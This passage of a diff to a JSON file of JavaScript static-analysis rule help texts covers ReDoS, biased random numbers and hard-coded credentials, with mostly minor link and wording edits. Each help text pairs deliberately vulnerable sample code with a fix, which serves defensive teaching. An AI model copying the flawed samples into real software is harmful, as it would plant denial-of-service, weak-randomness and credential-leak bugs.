sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + "text" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(? 1000) {\n throw new Error(\"Input too long\");\n}\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str)\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], @@ -357,8 +124,8 @@ "level" : "error" }, "help" : { - "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](http://www.cs.bham.ac.uk/~hxt/research/reg-exp-sec.pdf).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" + "text" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", + "markdown" : "# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *nk* or even *2n*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-1333", "external/cwe/cwe-730", "external/cwe/cwe-400" ], @@ -1049,7 +816,7 @@ "id" : "js/biased-cryptographic-random", "name" : "js/biased-cryptographic-random", "shortDescription" : { - "text" : "Creating biased random numbers from a cryptographically secure source." + "text" : "Creating biased random numbers from a cryptographically secure source" }, "fullDescription" : { "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." @@ -1059,15 +826,15 @@ "level" : "warning" }, "help" : { - "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", - "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" + "text" : "# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", + "markdown" : "# Creating biased random numbers from a cryptographically secure source\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" }, "properties" : { "tags" : [ "security", "external/cwe/cwe-327" ], "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", "id" : "js/biased-cryptographic-random", "kind" : "problem", - "name" : "Creating biased random numbers from a cryptographically secure source.", + "name" : "Creating biased random numbers from a cryptographically secure source", "precision" : "high", "problem.severity" : "warning", "security-severity" : "7.5" @@ -1113,8 +880,8 @@ "level" : "warning" }, "help" : { - "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n", - "markdown" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\n\n## Example\nThe following code example connects to a Postgres database using the `pg` package and hard-codes user name and password:\n\n\n```javascript\nconst pg = require(\"pg\");\n\nconst client = new pg.Client({\n user: \"bob\",\n host: \"database.server.com\",\n database: \"mydb\",\n password: \"correct-horse-battery-staple\",\n port: 3211\n});\nclient.connect();\n\n```\nInstead, user name and password can be supplied through the environment variables `PGUSER` and `PGPASSWORD`, which can be set externally without hard-coding credentials in the source code.\n\n\n## References\n* OWASP: [Use of hard-coded password](https://www.owasp.org/index.php/Use_of_hard-coded_password).\n* Common Weakness Enumeration: [CWE-259](https://cwe.mitre.org/data/definitions/259.html).\n* Common Weakness Enumeration: [CWE-321](https://cwe.mitre.org/data/definitions/321.html).\n* Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n" + "text" : "# Hard-coded credentials\nIncluding unencrypted hard-coded authentication credentials in source code is dangerous because the credentials may be easily discovered. For example, the code may be open source, or it may be leaked or accidentally revealed, making the credentials visible to an attacker. This, in turn, might enable them to gain unauthorized access, or to obtain privileged information.\n\n\n## Recommendation\nRemove hard-coded credentials, such as user names, passwords and certificates, from source code. Instead, place them in configuration files, environment variables or other data stores if necessary. If possible, store configuration files including credential data separately from the source code, in a secure location with restricted access.\n\nIf the credentials are a placeholder value, make sure the value is obviously a placeholder by using a name such as `\"SampleToken\"` or `\"MyPassword\"`.\n\n\n## Example\nThe following code example connects to an HTTP request using an hard-codes authentication header:\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = 'user';\nlet password = 'passwd';\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 'text/json');\nheaders.append('Authorization', 'Basic' + base64.encode(username + \":\" + password));\n\nfetch(url, {\n method:'GET',\n headers: headers\n })\n.then(response => response.json())\n.then(json => console.log(json))\n.done();\n\n```\nInstead, user name and password can be supplied through the environment variables `username` and `password`, which can be set externally without hard-coding credentials in the source code.\n\n\n```javascript\nlet base64 = require('base-64');\n\nlet url = 'http://example.org/auth';\nlet username = process.env.USERNAME;\nlet password = process.env.PASSWORD;\n\nlet headers = new Headers();\n\nheaders.append('Content-Type', 